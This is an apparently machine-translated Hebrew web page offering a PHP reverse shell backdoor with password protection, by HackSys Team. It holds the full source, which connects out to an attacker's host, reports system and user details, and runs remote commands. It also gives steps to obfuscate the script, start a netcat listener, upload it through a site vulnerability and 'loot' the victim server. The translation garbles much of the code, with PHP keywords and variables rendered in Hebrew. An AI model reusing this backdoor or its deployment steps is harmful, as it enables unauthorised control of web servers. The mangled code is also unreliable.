היפוך Shell v1.0-PHP – מאפיין אימות
מוצר על ידי:
Ashfaq אנסארי
גרסה:
1.0
מחיר:
חופשי

נסקר על ידי:
דרוג:
5
על אוקטובר 9, 2012
השתנה לאחרונה:ינואר 18, 2013

תקציר:

הפוך Connect PHP Shell עם תכונת אימות מובנה. תסריט מדהים כדי להגן על הדלת האחורית שלך.

מבוא

 

כלי זה נועד למצב שבו העלאת pentest שיש לך גישה לשרת אינטרנט שבו פועל PHP.
להעלות התסריט הזה למקום בשורש האינטרנט ולאחר מכן להפעיל אותו על ידי גישה לכתובת האתר המתאימה בדפדפן שלך. התסריט יפתח חיבור TCP יוצא מהשרת למחשב מארח ויציאה המוגדר בתסריט. חייב חיבור TCP זה יהיה פגז.
 

זה יהיה פגז אינטראקטיביים נכון שבו אתה יכול להפעיל תוכניות כמו interective Telnet ו - SSH.
יש מעטפת זו תכונת אימות מובנה המונעת מלפגוע במישהו אחר הדלת האחורית שלך.
זה שונה מפגז מבוסס טופס אינטרנט המאפשר לך לשלוח פקודה אחת, אז אחזיר לך את הפלט.
 

לשנות את המקור

 

1
2
3
$ה-IP = "127.0.0.1"; #לשנות את זה ל-IP הציבורי שלך
$נמל = 4444;      #לשנות את זה לנמל שלך
$סיסמא = base64_decode("aGFja3N5c3RlYW0="); #סיסמא ברירת מחדל: hacksysteam (MD5)

 

לשנות את הערכים בהתאם לצורך והמצב שלך.
 

לערפל את המקור

 

ברגע שיש לך לעשות את השינוי, אתה יכול להשתמש בכל אתר PHP Obfuscator כדי לקודד סקריפט PHP.
 

דוגמה: http://www.codeeclipse.com/
 

לפני תמוה, אנא שנה את הערכים לעיל על פי הצרכים שלך.
 

מאזין Netcat התקנה

 

התחל מאזין Netcat על מארח ויציאה שיהיה נגיש על ידי שרת האינטרנט.
להשתמש באותו נמל כאן כפי שציינת בתסריט הפגז ההפוך לדוגמה (4444):
 

1
שורש @ BT:~ # NC -lvvp 4444

 

העלה סקריפט ולבצע אותה

 

שימוש בפגיעות שהתגלה על ידך באתר, להעלות reverse_shell.php.
להריץ את הסקריפט פשוט על ידי גלישה לקובץ חדש שהועלה בדפדפן האינטרנט שלך.
 

1
http://<ה-IP של הקורבן>/<העלה נתיב>/reverse_shell.php

 

פתק: אתה לא תראה את כל פלט בדף האינטרנט, זה להמשיך במצב המתנה אם שלה מוצלח.
 

לבזוז עם הקליפה שלך

 

קוד מקור

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?PHP
###################################################
#               הפוך # v1.0 Shell
#             # תכונת אימות
#                                                 #
#            Hacksys צוות - # Panthera
#             מחבר: Ashfaq אנסארי #
#            hacksysteam@hotmail.com #
#          http://hacksys.vfreaks.com #
#              עוצב עבור לינוקס #
#             תודה לlionaneesh #
#             lionaneesh@gmail.com #
###################################################

ini_set("Max_execution_time ',0);

$גרסה = "1.0";
$ה-IP = "127.0.0.1"; #לשנות את זה
$נמל = 4444;      #לשנות את זה
$סיסמא = base64_decode(&quot;aGFja3N5c3RlYW0="); #סיסמא ברירת מחדל: hacksysteam (MD5)

$דגל = ("
 _ _ _ _____
| |  | |          | |   / ____|                            
| |__| | __ _ ___| | _| (___ ___ _ _
|  __|/ _ ` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_ _____ / __, |___ /
 _______ __ / |                                
|__ __|                      |___ /
   | | ___ __ _ _ __ ___
   | |/ _ \/ _ ` | '_' _ \
   | |  __ / (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    הפוך Shell בPHP
    מחבר: Ashfaq אנסארי
   hacksysteam@hotmail.com
 http://hacksys.vfreaks.com /\n\n"
);

$pwd = shell_exec("Pwd");
$sysinfo = shell_exec("Uname-");
$תעודת זהות = shell_exec(תעודת זהות | לחתוך-D "(" -ו 2 | לחתוך-D ")" -ו 1 ');
$תאריך = shell_exec("מועד");
$רק = 1337;
$מידע =
("
מערכת מידע:\n$sysinfo
ספריית עבודה נוכחית: $pwd
קבוצת משתמשים: $תעודת זהות
תאריך ושעה נוכחי: $תאריך\n
"
);

להדפיס "\nמנסה להתחבר: $ה-IP ביציאה $נמל ...\n\n";

$sockfd = fsockopen($ה-IP , $נמל , $errno, $errstr );

אם($errno != 0)
  {
    להדפיס "\n****** תרעו שגיאה ******\nNNumber השגיאה: $errno\nמחרוזת שגיאה: $errstr\n\n";
    die(0);
  }
אחר אם (!$sockfd)
  {
    להדפיס "חמורה : שגיאה בלתי צפויה אירעה כאשר הייתה מנסה להתחבר!\n";
  }
אחר
  {
    להדפיס "מחובר ל: $ה-IP ביציאה $נמל ...\n\n";
    fputs ($sockfd , $דגל);
    fputs($sockfd ,"הזן את הסיסמה: ");
    $getpass = לגזום(fgets($sockfd, strlen($סיסמא) + 2));

    אם ($getpass == $סיסמא)
    {
      fputs($sockfd, "\nמוצלח אימות..\n");
      fputs($sockfd, $מידע);
      בעוד(!EOF($sockfd))
      {
    $cmdPrompt = לגזום($תעודת זהות) . "@" . לגזום($ה-IP) . ":~" . לגזום($pwd) . "# ";
    fputs ($sockfd , $cmdPrompt );
    $פקודה = לגזום(fgets($sockfd, $רק));
        אם (לגזום($פקודה) == "צא")
    {
      fputs($sockfd ,"\nבוטל על ידי משתמש ... יציאה ..." );
      fclose($sockfd);
      die(0);
    }
    fputs($sockfd , "\n" . shell_exec($פקודה) . "\n");
      }
      fclose($sockfd);
      die(0);
    }
    אחר
    {
      fputs($sockfd ,"\nלא חוקי סיסמא ... הפסקת ...");
      fclose($sockfd);
      die(0);
    }
  }
?>

 

צילום מסך

 


 

הורד ההפוך Shell v1.0-PHP – מאפיין אימות

 

Reverse_Shell_v1.0.zip

 
 
 

21,010 סה"כ צפיות, 18 צפיות היום

שתי הכרטיסיות הבאות לשנות את התוכן בהמשך.

Ashfaq אנסארי

חוקר אבטחה
Ashfaq אנסארי הוא המייסד של HackSys צוות שם קוד "Panthera". הוא חוקר אבטחה עם ניסיון בהיבטים שונים של אבטחת המידע. הוא חיבר "נהג פגיע HackSys קיצוני" ו - "Shellcode מוות". הוא גם כתב ופרסם סקירות טכניות שונות על ניצול תוכנה ברמה נמוכה. עניין הליבה שלו טמון ב "ניצול רמה נמוך", "הנדסה הפוכה", "ניתוח תכנית" ו - "Fuzzing ההיברידית". הוא fanboy של בינה המלאכותית ומערכות לומדות. הוא הפרק להוביל ל null פונה.

ההודעות אחרונות על ידי Ashfaq אנסארי (לראות את כל)

השאר תגובה

כתובת הדוא"ל שלך לא תפורסם. שדות חובה מסומנים *